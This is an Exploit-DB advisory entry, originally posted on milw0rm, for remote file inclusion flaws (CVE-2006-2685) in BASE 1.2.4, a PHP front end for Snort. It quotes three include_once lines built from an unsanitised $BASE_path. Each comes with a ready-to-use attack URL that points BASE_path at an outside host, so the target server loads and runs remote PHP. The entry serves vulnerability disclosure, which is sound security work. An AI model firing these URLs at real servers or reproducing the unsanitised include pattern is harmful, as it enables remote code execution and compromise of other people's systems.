BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion
Author: str0ke
type: webapps
platform: php
port:
date_added: 2006-05-24
date_updated: 2016-07-29
verified: 1
codes: OSVDB-49367;CVE-2006-2685;OSVDB-49366;OSVDB-25770
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.combase-1.2.4.tar.gz
# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
# Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################
[code (base_qry_common.php)]
include_once("$BASE_path/includes/base_signature.inc.php");
[/code]
http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&
########################################
[code (base_stat_common.php)]
include_once("$BASE_path/includes/base_constants.inc.php");
[/code]
http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&
###############################################
[code (includes/base_include.inc.php)]
include_once("$BASE_path/includes/base_db.inc.php");
include_once("$BASE_path/includes/base_output_html.inc.php");
include_once("$BASE_path/includes/base_state_common.inc.php");
...
[/code]
http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&
#######################################################
# milw0rm.com [2006-05-25]